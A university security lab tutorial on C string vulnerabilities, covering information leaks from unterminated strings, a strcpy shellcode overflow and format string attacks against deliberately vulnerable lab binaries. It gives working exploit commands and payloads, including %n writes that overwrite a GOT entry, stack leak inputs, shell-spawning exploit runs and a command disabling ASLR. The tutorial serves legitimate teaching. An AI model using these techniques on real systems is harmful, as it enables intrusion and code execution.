Lab 07 - Strings

Resources

Secure Coding in C and C++
String representation in C
Improper string length checking
Format String definition, Format String Attack (OWASP), Format String Attack (webappsec)
strlcpy and strlcat - consistent, safe, string copy and concatenation. This resource is useful to understand some of the string manipulation problems.

Lab Support Files

We will use this lab archive throughout the lab.

Please download the lab archive and then unpack it using the commands below:

student@mjolnir:~$ wget http://elf.cs.pub.ro/oss/res/labs/lab-07.tar.gz
student@mjolnir:~$ tar xzf lab-07.tar.gz

After unpacking we will get the lab-07/ folder that we will use for the lab:

student@mjolnir:~$ cd lab-07/
student@mjolnir:~/lab-07$ ls
basic-format-string  basic-info-leak
format-string  info-leak
printf-features  string-shellcode

Intro

This is a tutorial-based lab. Throughout this lab you will learn about frequent errors that occur when handling strings. This tutorial focuses on the C language. Generally, OOP languages (like Java, C#, C++) use classes to represent strings, which simplifies the way strings are handled and decreases the frequency of programming errors.

What is a string?

Conceptually, a string is a sequence of characters. A string can be represented in multiple ways. One way is to represent it as a contiguous memory buffer in which each character is encoded as a number. For example, the ASCII encoding uses 7-bit integers to encode each character; because it is more convenient to store 8 bits at a time in a byte, an ASCII character is stored in one byte.

The type for representing an ASCII character in C is char and it uses one byte. As a side note, sizeof(char) == 1 is the only exact size guarantee that the C standard gives for its basic types.

Another encoding that can be used is Unicode (with UTF-8, UTF-16, UTF-32 etc. as mappings). To represent a Unicode string, more than one byte may be needed for one character. The char16_t and char32_t types were introduced in the C standard (C11) to represent these strings. The C language also has another type, called wchar_t, which is implementation defined and should not be used to represent Unicode characters.

Our tutorial will focus on ASCII strings, where each character is represented in one byte. We will show a few examples of what happens when one calls string manipulation functions that are assuming a specific encoding of the string.

You will find extensive information on ASCII in the ascii man page. Inside a Unix terminal issue the command:

man ascii

Length management

In C, the length of an ASCII string is given by its contents. An ASCII string ends with a 0 value byte called the NUL byte. Every str* function (i.e. a function with the name starting with str, such as strcpy, strcat, strdup, strstr etc.) uses this 0 byte to detect where the string ends. As a result, not ending strings in 0 and using str* functions leads to vulnerabilities.
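
The effect of a missing NUL byte can be modelled outside C. The sketch below is a hypothetical Python model, not code from the lab archive: the byte strings stand in for a region of memory, c_string_at() mimics the way a str* function scans for the terminator, and the neighbouring bytes are made up for illustration.

```python
def c_string_at(memory: bytes, start: int) -> bytes:
    """Return the bytes a C str* function would treat as the string at `start`."""
    end = memory.index(b"\x00", start)  # scan forward until the first NUL byte
    return memory[start:end]


# Hypothetical layout: a 32-byte buffer followed directly by other data.
buffer_terminated = b"A" * 31 + b"\x00"     # last byte reserved for the NUL
buffer_full = b"A" * 32                     # no room left for the NUL byte
neighbour = b"\x78\x6d\x99\xff" + b"\x00"   # made-up adjacent data

print(len(c_string_at(buffer_terminated + neighbour, 0)))
print(len(c_string_at(buffer_full + neighbour, 0)))
```

In the second case the "string" is longer than the buffer that was supposed to hold it: the scan only stops at the NUL byte that happens to follow the neighbouring data.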

Basic Info Leak (tutorial)

Enter the basic-info-leak/ subfolder in the lab archive. It's a basic information leak example.

In basic_info_leak.c, buf is supplied as input, hence it is not trusted. We should be careful with this buffer. If the user gives 32 bytes as input, then strcpy will copy bytes into my_string until it finds a NUL byte (0x00). Because the stack grows down on most platforms, the bytes that follow buf belong to the rest of the stack frame: after the buf variable the stack stores the old ebp, the function return address and then the function parameters. This information is copied into my_string. As such, printing my_string (past byte index 32) using puts() results in an information leak.

We can test this using:

$ python -c 'print "A"*32' | ./basic_info_leak 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX�����

In order to check the hexadecimal values of the leak, we pipe the output through xxd:

$ python -c 'print "A"*32' | ./basic_info_leak | xxd
00000000: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000010: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000020: 786d 99ff f184 0408 0a

We have leaked two values above:

the old/stored ebp value (right after the buffer): 0xff996d78 (it's a little endian architecture); it will differ on your system
the my_main() return address: 0x080484f1
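
The two values can also be decoded programmatically rather than by reading the dump backwards. This is a minimal sketch using Python's struct module; the hex string is copied from the xxd output above, and the variable names are only illustrative.

```python
import struct

# The eight bytes that follow the 32 "A" characters in the xxd dump above.
leak = bytes.fromhex("786d99ff" "f1840408")

# "<II" means two little-endian unsigned 32-bit integers.
stored_ebp, return_address = struct.unpack("<II", leak)

print(hex(stored_ebp))
print(hex(return_address))
```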

The return address usually doesn't change (except for executables with PIE, Position Independent Executable, support). But assuming ASLR is enabled, the ebp value changes at each run. If we leak it, we have a base address that we can use to leak or overwrite other values. We'll see more of that in the Information Leak task.

Recap: String Shellcode

For starters, let's do a recap on creating a shellcode-based attack and exploiting a string-based vulnerability.

In the string-shellcode/ subfolder in the lab archive you have a vulnerable executable dubbed string_shellcode. The original source code is string_shellcode.c. There is an obvious vulnerability when using strcpy() that will lead to an overflow and a rewrite of the get_num_alpha() function return address when called with a large enough number of characters in g_buffer.

Fill the TODO spots in the exploit.py script to inject and execute a shell.

ASLR is on. The shellcode will be stored at the beginning of the g_buffer global variable which has a constant address. You can determine it using:

nm string_shellcode | grep ' g_buffer'

Use GDB PEDA and pattc and patto to determine the offset between l_buffer and the get_num_alpha() function return address.

In GDB/PEDA in order to send a given string (such as the pattern outputted by pattc) to the program standard input, use the process substitution construct:

gdb-peda$ r < <(echo 'AAAA.....')

Construct the payload as usual: add the shellcode, add padding and overwrite the get_num_alpha() function return address with the address of the shellcode (i.e. the address of the g_buffer global variable).
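
The layout described above can be sketched as a small helper. This is not the content of exploit.py: build_payload() is a hypothetical function, the shellcode bytes, offset and address are placeholders rather than values measured on the lab binary, and the "<I" pointer format assumes a 32-bit executable.

```python
import struct


def build_payload(shellcode: bytes, offset: int, target: int,
                  filler: bytes = b"A") -> bytes:
    """Place the shellcode first, pad up to the return address, append the new address."""
    if len(shellcode) > offset:
        raise ValueError("shellcode does not fit before the return address")
    padding = filler * (offset - len(shellcode))
    # "<I" packs a 32-bit little-endian pointer (assumption: 32-bit executable).
    return shellcode + padding + struct.pack("<I", target)


# All three values below are placeholders, not measurements from the lab binary.
example_shellcode = b"\x90" * 8     # stand-in bytes, not a working shellcode
example_offset = 40                 # would come from pattc / patto
example_g_buffer = 0x0804A060       # would come from nm

payload = build_payload(example_shellcode, example_offset, example_g_buffer)
print(len(payload))
```

Since the overflow goes through strcpy(), the real shellcode and padding must not contain NUL bytes, otherwise the copy stops early.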

Information Leak

We will now show how improper string handling leads to information leaks from memory. For this, please access the info-leak/ subfolder in the lab archive. Please browse the info-leak.c source code file. The executable file is already generated in info_leak (a 32-bit ELF file).

The snippet below shows the relevant code. The goal is to call the my_evil_func() function. One of the building blocks of exploiting a vulnerability is determining whether or not we have a memory write. If we have memory writes, then getting code execution is a matter of getting things right. In this task we assume that we have a memory write (i.e. we can write any value at any address). You can call the my_evil_func() function by overwriting the return address of the my_main() function:

#define NAME_SZ 32
 
static void read_name(char *name)
{
	memset(name, 0, NAME_SZ);
	read(0, name, NAME_SZ);
	//name[NAME_SZ-1] = 0;
}
 
static void my_main(void)
{
	char name[NAME_SZ];
 
	read_name(name);
	printf("hello %s, what address to modify and with what value?\n", name);
	fflush(stdout);
	my_memory_write();
	printf("Returning from main!\n");
}

What catches our eye is that the read() call in the read_name() function reads up to 32 bytes, the full size of name. If we provide it 32 bytes, name won't be NUL-terminated, which results in an information leak when printf() is called in the my_main() function.

Exploiting the memory write using the info leak

Let's first try to see how the program works:

$ python -c 'import sys; sys.stdout.write(10*"A")' | ./info_leak 
hello AAAAAAAAAA, what address to modify and with what value?

The binary wants an input from the user using the read() library call as we can see below:

$ python -c 'import sys; sys.stdout.write(10*"A")' | strace -e read ./info_leak
read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\360\203\1\0004\0\0\0"..., 512) = 512
read(0, "AAAAAAAAAA", 32)               = 10
hello AAAAAAAAAA, what address to modify and with what value?
read(0, "", 4)                          = 0
+++ exited with 255 +++

The input is read using the read() system call. The first read expects 32 bytes. You can see already that there's another read() call. That one is the first read() call in the my_memory_write() function.

As noted above, if we use exactly 32 bytes for name we will end up with a non-null-terminated string, leading to an information leak. Let's see how that goes:

$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak
hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�)���, what address to modify and with what value?
 
$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd
00000000: 6865 6c6c 6f20 4141 4141 4141 4141 4141  hello AAAAAAAAAA
00000010: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000020: 4141 4141 4141 f0dc ffff ff7f 2c20 7768  AAAAAA......, wh
00000030: 6174 2061 6464 7265 7373 2074 6f20 6d6f  at address to mo
00000040: 6469 6679 2061 6e64 2077 6974 6820 7768  dify and with wh
00000050: 6174 2076 616c 7565 3f0a                 at value?.

We see we have an information leak. We leak one piece of data above: 0x7fffffffdcf0. It looks like a stack address. The leak stops there because the two most significant bytes of this 64-bit value are zero, and printf() stops at the first NUL byte.

If we run multiple times we can see that the leaked value differs between runs:

$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd | grep ','
00000020: 4141 4141 4141 f0dc ffff ff7f 2c20 7768  AAAAAA......, wh

The variable part is related to a stack address (it starts with 0x7f); it varies because ASLR is enabled. We want to look more carefully using GDB and figure out what the variable value represents:

$ gdb -q ./info_leak
Reading symbols from ./info_leak...done.
gdb-peda$ b printf
Breakpoint 1 at 0x400560
gdb-peda$ r < <(python -c 'import sys; sys.stdout.write(32*"A")')
Starting program: info_leak < <(python -c 'import sys; sys.stdout.write(32*"A")')
[...]
 
gdb-peda$ x/12g name
0x7fffffffdc20:	0x4141414141414141	0x4141414141414141
0x7fffffffdc30:	0x4141414141414141	0x4141414141414141
0x7fffffffdc40:	0x00007fffffffdc50	0x00000000004007aa
gdb-peda$ x/2i 0x004007aa
   0x4007aa <main+9>:	mov    edi,0x4008bc
   0x4007af <main+14>:	call   0x400550 <puts@plt>
gdb-peda$ pdis main
Dump of assembler code for function main:
   0x00000000004007a1 <+0>:	push   rbp
   0x00000000004007a2 <+1>:	mov    rbp,rsp
   0x00000000004007a5 <+4>:	call   0x400756 <my_main>
   0x00000000004007aa <+9>:	mov    edi,0x4008bc
   0x00000000004007af <+14>:	call   0x400550 <puts@plt>
   0x00000000004007b4 <+19>:	mov    eax,0x0
   0x00000000004007b9 <+24>:	pop    rbp
   0x00000000004007ba <+25>:	ret    
End of assembler dump.
gdb-peda$

From the GDB above, we determine that, after our buffer, there are two values: one value is the stored rbp (i.e. old rbp) and one value is the return address of the my_main() function (that gets it back to main()).

When we leak the two values we are able to retrieve the stored rbp value. In the above run the stored rbp value is 0x00007fffffffdc50. We also see that the stored rbp value is stored at address 0x7fffffffdc40, which is the value of the current rbp. We have the situation in the diagram below:

We marked the stored rbp value (i.e. the frame pointer for main(): 0x7fffffffdc50) with the font color red in both places.

In short, if we leak the value of the stored rbp (i.e. the frame pointer for main(): 0x00007fffffffdc50) we can determine the value of the current rbp (i.e. the frame pointer for my_main(): 0x7fffffffdc40) by subtracting 16. The address where the my_main() return address is stored (0x7fffffffdc48) is computed by subtracting 8 from the leaked rbp value. By overwriting the value at this address we redirect execution and call my_evil_func().
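
The arithmetic above can be sketched in a few lines of Python. This is an illustration only: parse_leaked_pointer() is a hypothetical helper, the six input bytes are copied from the xxd dump of the leak shown earlier, and the offsets 16 and 8 hold for the frame layout seen in the GDB session, not in general.

```python
import struct


def parse_leaked_pointer(raw: bytes) -> int:
    """Rebuild a 64-bit little-endian pointer from the bytes printf() printed."""
    # printf() stops at the first NUL byte, so the zero high-order bytes are
    # missing from the output and have to be added back before unpacking.
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]


# The six bytes that follow the 32 "A" characters in the xxd dump of the leak.
stored_rbp = parse_leaked_pointer(bytes.fromhex("f0dcffffff7f"))

current_rbp = stored_rbp - 16           # frame pointer of my_main()
return_address_slot = stored_rbp - 8    # where my_main()'s return address is stored

print(hex(stored_rbp), hex(current_rbp), hex(return_address_slot))
```

The same subtraction applied to the value from the GDB session (0x7fffffffdc50) gives 0x7fffffffdc48, the address computed in the text.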

In order to write the return address of the my_main() function with the address of the my_evil_func() function, make use of the conveniently (but not realistically) placed my_memory_write() function. The my_memory_write() allows the user to write arbitrary values to arbitrary memory addresses.

Considering all of this, update the TODO lines of the exploit.py script to make it call the my_evil_func() function.

Same as above, use nm to determine the address of the my_evil_func() function.

Use the above logic to determine the stored rbp value from the leak and then the address where the my_main() return address is stored.

See here examples of using the unpack() function.

In case of a successful exploit the program will exit with code 42 from the my_evil_func() function, as shown below:

$ python exploit.py 
[!] Could not find executable 'info_leak' in $PATH, using './info_leak' instead
[+] Starting local process './info_leak': pid 6422
[*] old_ebp is 0x7fffffffdd40
[*] return address is located at is 0x7fffffffdd38
[*] Process './info_leak' stopped with exit code 42 (pid 6422)

The rule of thumb is: Always know your string length.

Format String Attacks

We will now see how (im)proper use of printf may provide us with ways of extracting information or doing actual attacks.

Calling printf, or some other function that takes a format string as a parameter, directly with a string supplied by the user leads to a vulnerability that enables a format string attack.

The definition of printf:

int printf(const char *format, ...);

Let's recap some useful format specifiers:

%08x – prints a number in hex format, meaning takes a number from the stack and prints in hex format
%s – prints a string, meaning takes a pointer from the stack and prints the string from that address
%n – writes the number of bytes written so far to the address given as a parameter to the function (takes a pointer from the stack). This format is not widely used but it is in the C standard.

%x and %n are enough to have memory read and write and hence, to successfully exploit a vulnerable program that calls printf (or other format string function) directly with a string controlled by the user.

Example 2

printf(my_string);

The above snippet is a good example of why ignoring compile time warnings is dangerous. The given example is easily detected by a static checker.

Try to think about:

The peculiarities of printf (variable number of arguments)
Where printf stores its arguments (hint: on the stack)
What happens when my_string is "%x"
How matching between format strings (e.g. the one above) and arguments is enforced (hint: it's not) and what happens in general when the number of arguments doesn't match the number of format specifiers
How we could use this to cause information leaks and arbitrary memory writes (hint: see the format specifiers at the beginning of the section)

Example 3

We would like to check some of the well-known and not-so-well-known features of the printf function. Some of them may be used for information leaking and for attacks such as format string attacks.

Go into the printf-features/ subfolder and browse the printf-features.c file. Compile the executable file using:

make

and then run the resulting executable file using

./printf-features

Go through the printf-features.c file again and check how print, length and conversion specifiers are used by printf. We will make use of the %n feature that allows memory writes, a requirement for attacks.

Basic Format String Attack

You will now do a basic format string attack using the basic-format-string/ subfolder in the lab archive. The source code is in basic_format_string.c and the executable is in basic_format_string.

You need to use %n to set the value of the v variable to 200. There are three steps:

Determine the address of the v variable using nm.
Determine the n-th parameter of printf() that you can write to using %n. The buffer variable will have to be that parameter; you will store the address of the v variable in the buffer variable.
Construct a format string that enables the attack; the number of characters processed by printf() until %n is matched will have to be 200.

For the second step let's run the program multiple times and figure out where the buffer starts. We fill buffer with the AAAAAAAA string and we expect to discover it using the printf() format specifiers.

$  ./basic_format_string 
AAAAAAAA
%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx
7fffffffdcc07fffffffdcc01f6022897ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25

$ ./basic_format_string 
AAAAAAAA
%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx
x7fffffffdcc07fffffffdcc0116022917ffff7dd18d06c6c25786c6c25786c6c25786c6c25786c6c25786c6c25787fffffffdcc07fffffffdcc01f6022917ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a

$ ./basic_format_string 
AAAAAAAA
%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx
7fffffffdcc07fffffffdcc01f6022997ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a4141414141414141

In the last run we get the 4141414141414141 representation of AAAAAAAA. That means that, if we replace the final %llx with %n, we will write to the address 0x4141414141414141 the number of characters processed so far:

$ echo -n '7fffffffdcc07fffffffdcc01f6022997ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a' | wc -c
162

We need that number to be 200. You can fine-tune the format string by using a construct such as %32llx to print a number padded to 32 characters instead of a maximum of 16 characters. See how much extra room you need and see if you reach 200 bytes.

The construct needn't use a multiple of 8 for length. You may use the %32llx or %33llx or %42llx. The numeric argument states the length of the print output.
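
The amount of padding still needed can be worked out from the output of the last run. The sketch below only does the counting; the choice of widening the first specifier is one possible option, not necessarily the one used in the reference solution. Changing the format string also changes the bytes that printf() finds on the stack, so the output should be measured again after every change.

```python
# Output printed before the argument that holds AAAAAAAA in the last run above.
printed = (
    "7fffffffdcc0" "7fffffffdcc0" "1f" "602299" "7ffff7fd44c0"
    + "786c6c25" * 14
    + "40000a"
)
target = 200
missing = target - len(printed)

# Widen the first specifier: it printed 12 characters without padding.
first_field = len("7fffffffdcc0")
widened = "%{}llx".format(first_field + missing)

print(len(printed), missing, widened)
```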

After the plan is complete, write down the attack by filling the TODO lines in the exploit.py solution skeleton.

After you write the value 200 in v, you should obtain a shell:

$ python exploit64.py 
[!] Could not find executable 'basic_format_string' in $PATH, using './basic_format_string' instead
[+] Starting local process './basic_format_string': pid 20785
[*] Switching to interactive mode
                                     7fffffffdcc0  7fffffffdcc01f60229b7ffff7dd18d03125786c6c393425786c6c25786c6c34786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25a6e25
$

Extra: Format String Attack

The goal of this task is to call my_evil_func again. This task is also tutorial based.

int
main(int argc, char *argv[])
{
	printf(argv[1]);
	printf("\nThis is the most useless and insecure program!\n");
	return 0;
}

Transform Format String Attack to a Memory Write

Any string that represents a useful format (e.g. %d, %x etc.) can be used to discover the vulnerability.

$ ./format "%08x %08x %08x %08x"
00000000 f759d4d3 00000002 ffd59bd4
This is the most useless and insecure program!

The values starting with 0xf are very likely pointers. Again, we can use this vulnerability as an information leak. But we want more.

Another useful format for us is %m$ followed by any normal conversion specifier. It means that the m-th parameter is used as input for that specifier: %10$08x will print the 10th parameter with %08x. This allows us to access the stack precisely.

Example:

$ ./format "%08x %08x %08x %08x %1\$08x %2\$08x %3\$08x %4\$08x"
00000000 f760d4d3 00000002 ff9aca24 00000000 f760d4d3 00000002 ff9aca24
This is the most useless and insecure program!

Note the equivalence between formats.
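
To make the equivalence concrete, here is a toy model of how printf() walks its arguments. It is a deliberately simplified Python sketch, not how libc is implemented: toy_printf() is a hypothetical function that only understands %x with an optional position, zero flag and width, and the stack list reuses the four values printed in the run above.

```python
import re

# %[m$][0][width]x
SPEC = re.compile(r"%(?:(\d+)\$)?(0?)(\d*)x")


def toy_printf(fmt: str, stack: list) -> str:
    """Expand %x specifiers by reading successive or explicitly numbered stack slots."""
    next_slot = 0

    def expand(match):
        nonlocal next_slot
        position, zero_flag, width = match.groups()
        if position:                # %m$x: pick the m-th argument directly
            value = stack[int(position) - 1]
        else:                       # %x: consume the next argument in order
            value = stack[next_slot]
            next_slot += 1
        pad = "0" if zero_flag else " "
        return format(value, "x").rjust(int(width or 0), pad)

    return SPEC.sub(expand, fmt)


stack = [0x00000000, 0xF760D4D3, 0x00000002, 0xFF9ACA24]
print(toy_printf("%08x %08x %08x %08x %1$08x %2$08x %3$08x %4$08x", stack))
```

The model never checks how many arguments were really passed. Neither does printf(): it keeps reading whatever sits in the next slot.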

Now, because we are able to select any higher address with this function and because the buffer is on the stack, sooner or later we will discover our own buffer.

$ ./format "$(perl -e 'printf "%%08x\x0a"x10000')"

Depending on your setup you should be able to view the hex representation of the string "%08x\n".

Why do we need our own buffer? Remember the %n format? It can be used to write at an address given as parameter. The idea is to give this address as parameter and achieve memory writing. We will see later how to control the value.

The next steps are done with ASLR disabled. In order to disable ASLR, please run

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

By trial and error or by using GDB (breakpoint on printf) we can determine where our buffer shows up among the printf arguments:

$ ./format "$(perl -e 'printf "A"x512 . "%%08x   \x0a"x200')"  | grep -n 41 | head
17:415729ac   
56:ffffdd41   
128:41007461   
129:41414141   
130:41414141

Command line Perl/Python exploits tend to get very tedious and hard to read when the payload gets more complex. You can use the following reference Perl script to write your exploit. The code is equivalent to the above one-liner.

#!/usr/bin/env perl
 
use strict;
use warnings;
use v5.20;
 
my $stack_items = 1000;
 
printf "A" x 512;
printf "%%08x   \x0a" x $stack_items;

Then call the format using (note the enclosing double-quotes):

$ ./format "$(perl exploit.pl)"

One idea is to keep things in multiples of 4, like I did for "%08x   \x0a". If you look at line 128, one of our As is there. Because the machine is little endian, the 0x41 appears as the most significant byte. We want to fix this, to have our buffer aligned. Note that you can add as many format specifiers as you want; the start of the buffer will be the same (more or less).

We can compress our buffer by specifying the position of the argument.

$ ./format "$(perl -e 'printf "BCDE"."A"x510 . "%%126\$08x"')"
BCDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45444342
This is the most useless and insecure program!

You can see that the last piece of output is our "BCDE" string printed with %08x. This means that we know where our buffer is.

You need to enable core dumps in order to reproduce the steps below:

$ ulimit -c unlimited

The steps below work on a given version of libc and a given system. That is why the instruction that causes the fault is

mov %edx,(%eax)

or the equivalent in Intel syntax

mov DWORD PTR [eax], edx

It may be different on your system; for example edx may be replaced by esi, such as

mov DWORD PTR [eax], esi

Update the explanations below accordingly.

Remove any core files you may have generated before testing your program:

rm -f core

We can replace %08x with %n; this should lead to a segmentation fault.

$ ./format "$(perl -e 'printf "BCDE"."A"x510 . "%%126\$08n"')"
Segmentation fault (core dumped)
$ gdb ./format -c core
...
Core was generated by `./format BCDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0  0xf7e580a2 in vfprintf () from /lib/i386-linux-gnu/libc.so.6
(gdb) bt
#0  0xf7e580a2 in vfprintf () from /lib/i386-linux-gnu/libc.so.6
#1  0xf7e5deff in printf () from /lib/i386-linux-gnu/libc.so.6
#2  0x08048468 in main (argc=2, argv=0xffffd2f4) at format.c:18
(gdb) x/i $eip
=> 0xf7e580a2 <vfprintf+17906>:	mov    %edx,(%eax)
(gdb) info registers $edx $eax
edx            0x202	514
eax            0x45444342	1162101570
(gdb) quit

Bingo. We have a memory write. The vulnerable code tried to write the value 514 at the address 0x45444342 ("BCDE" in little endian). The value 514 is the amount of data written so far by printf (510 As and "BCDE").
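
Both register values from the core dump can be cross-checked with a couple of lines of Python. This is only a sanity check of the numbers above, using struct to interpret the four bytes of "BCDE" the way a 32-bit little-endian machine does.

```python
import struct

# %n treats the selected stack slot as a pointer; here the slot held "BCDE".
address = struct.unpack("<I", b"BCDE")[0]

# Characters printed before %n was reached: "BCDE" plus 510 "A"s.
written_value = len(b"BCDE") + 510

print(hex(address), written_value, hex(written_value))
```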

Right now, our input string has 518 bytes. But we can further compress it, thus making the value that we write independent of the length of the input.

$ ./format "$(perl -e 'printf "BCDE". "A"x506 . "%%99x" . "%%126\$08n"')"
Segmentation fault (core dumped)
$ gdb ./format -c core
(gdb) info registers $edx $eax
edx            0x261	609
eax            0x45444342	1162101570
(gdb) quit

Here we managed to write 609 (4+506+99). Note that we should keep the total length of the argument the same, so that our buffer stays at the same position on the stack. This means that if we want to print with a padding of 100 (three digits) we should remove one A. You can try this by yourself.

How far can we go? Probably we can use any integer for specifying the number of bytes which are used for a format, but we don't need this; moreover specifying a very large padding is not always feasible, think what happens when printing with snprintf. 255 should be enough.

Remember, we want to write a value to a certain address. So far we control the address, but the value is somewhat limited. If we want to write a full 4-byte value we can make use of the endianness of the machine: the idea is to write the value one byte at a time, first at the address n, then at the address n+1 and so on.

Let's first display the addresses. We are using the address 0x804a008, which is the address of the GOT entry for the puts function. Basically, we will overwrite the GOT entry for puts.

$ objdump -R ./format | grep puts
0804a008 R_386_JUMP_SLOT   puts
$ ./format "$(perl -e 'printf "\x08\xa0\x04\x08". "\x09\xa0\x04\x08" . "\x0a\xa0\x04\x08". "\x0b\xa0\x04\x08" . "A"x498 . "%%255x|" . "%%126\$08x" . "%%255x|" . "%%127\$08x" . "%%255x|" . "%%128\$08x" . "%%255x|" . "%%129\$08x"')"
 
 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ...
0|0804a008
f7e2a4d3|0804a009
2|0804a00a
ffffd2c4|0804a00b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            This is the most useless and insecure program!

Why are we printing 498 As? We added 12 bytes before our format and 6 extra bytes for the output – the | is there only for pretty print. We want to keep in place the first argument – anyway, you should always check this.

Let's replace %x with %n:

$ ./format "$(perl -e 'printf "\x08\xa0\x04\x08". "\x09\xa0\x04\x08" . "\x0a\xa0\x04\x08". "\x0b\xa0\x04\x08" . "A"x498 . "%%255x|" . "%%126\$08n" . "%%255x|" . "%%127\$08n" . "%%255x|" . "%%128\$08n" . "%%255x|" . "%%129\$08n"')"
$ gdb ./format -c core
Program terminated with signal 11, Segmentation fault.
#0  0x02020202 in ?? ()
(gdb) x/x 0x0804a000
0x804a000 <printf@got.plt>:	0xf7e5ded0
(gdb) x/x 0x0804a004
0x804a004 <fwrite@got.plt>:	0x08048396
(gdb) x/x 0x0804a008
0x804a008 <puts@got.plt>:	0x02020202
(gdb) x/x 0x0804a00c
0x804a00c <__gmon_start__@got.plt>:	0x08000006
(gdb)

In the gdb session above you can see:

the GOT entry for printf points to a library address (the address starts with 0xf)
the GOT entry for fwrite points to some code inside the binary. This means that the function wasn't called yet, so the dynamic linker hasn't resolved its address yet.
the puts entry points to 0x02020202. This is the value that we wrote.

How come we wrote the first 0x02? Just before executing the first %n the vulnerable code printed 770 (4*4+498+256) bytes and hex(770) == 0x302.

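How come the rest of the bytes are 0x02? After executing the first %n we printed another 256 bytes before each following %n, so we actually wrote 0x402, 0x502 and 0x602 at the next three addresses. Each write stores a full 4-byte integer, so it also spills into the following bytes: you can see that the three low-order bytes of the __gmon_start__@got.plt entry are 0x000006.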
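
The overlapping writes can be replayed on a small byte array. The sketch below is a model of the GOT, not a dump of it: the two 4-byte slots stand for the puts and __gmon_start__ entries, their initial contents are placeholders (only the top byte 0x08 of the second slot matters), and write_int() is a hypothetical helper that mimics what %n stores on a 32-bit little-endian machine.

```python
import struct


def write_int(memory: bytearray, offset: int, value: int) -> None:
    """Mimic %n on a 32-bit target: store a 4-byte little-endian integer."""
    struct.pack_into("<I", memory, offset, value & 0xFFFFFFFF)


# Two neighbouring 4-byte GOT slots: puts, then __gmon_start__ (placeholder contents).
got = bytearray(struct.pack("<II", 0x08048000, 0x08048000))

count = 4 * 4 + 498         # bytes printed before the first "%255x|"
for offset in range(4):
    count += 255 + 1        # each "%255x|" prints 256 more bytes
    write_int(got, offset, count)

puts_entry, gmon_entry = struct.unpack("<II", got)
print(hex(puts_entry), hex(gmon_entry))
```

Each write overwrites three bytes of the previous one, so only the low byte of every count survives in the puts entry, while the upper bytes of the last write land in the next slot.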

We want to put the value 0x08048494.

$ objdump -d ./format | grep my_evil
08048494 <my_evil_func>:

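The first byte to write is 0x94 (the least significant one, since the machine is little endian). Recall that with a width of 255 we wrote 0x02 (the running count was 0x302). To write 0x94 (a count of 0x294) we replace the first 255 with 255-(0x302-0x294) == 145.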

$ ./format "$(perl -e 'printf "\x08\xa0\x04\x08". "\x09\xa0\x04\x08" . "\x0a\xa0\x04\x08". "\x0b\xa0\x04\x08" . "A"x498 . "%%145x|" . "%%126\$08n" . "%%255x|" . "%%127\$08n" . "%%255x|" . "%%128\$08n" . "%%255x|" . "%%129\$08n"')"
$ gdb ./format -c core
#0  0x94949494 in ?? ()
(gdb) quit

The next byte that we want to write is 0x84, so we need to replace the second 255 with 239. We continue in the same way for the remaining two bytes.

$ ./format "$(perl -e 'printf "\x08\xa0\x04\x08". "\x09\xa0\x04\x08" . "\x0a\xa0\x04\x08". "\x0b\xa0\x04\x08" . "A"x498 . "%%145x|" . "%%126\$08n" . "%%239x|" . "%%127\$08n" . "%%127x|" . "%%128\$08n" . "%%259x|" . "%%129\$08n"')" | tr -s ' ' > /dev/null
I'm evil, but nobody calls me :-(
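
The four field widths used in the final command (145, 239, 127 and 259) can be derived mechanically. The function below is a sketch written for this walkthrough, with hypothetical names; it assumes the layout used above: 514 bytes printed before the first specifier, one separator character after each %x field, and one %n per target byte.

```python
def widths_for(target: int, printed_before: int,
               separator: int = 1, minimum: int = 8) -> list:
    """Return one %x field width per byte of `target`, lowest byte first."""
    widths = []
    count = printed_before
    for shift in range(0, 32, 8):
        wanted = (target >> shift) & 0xFF
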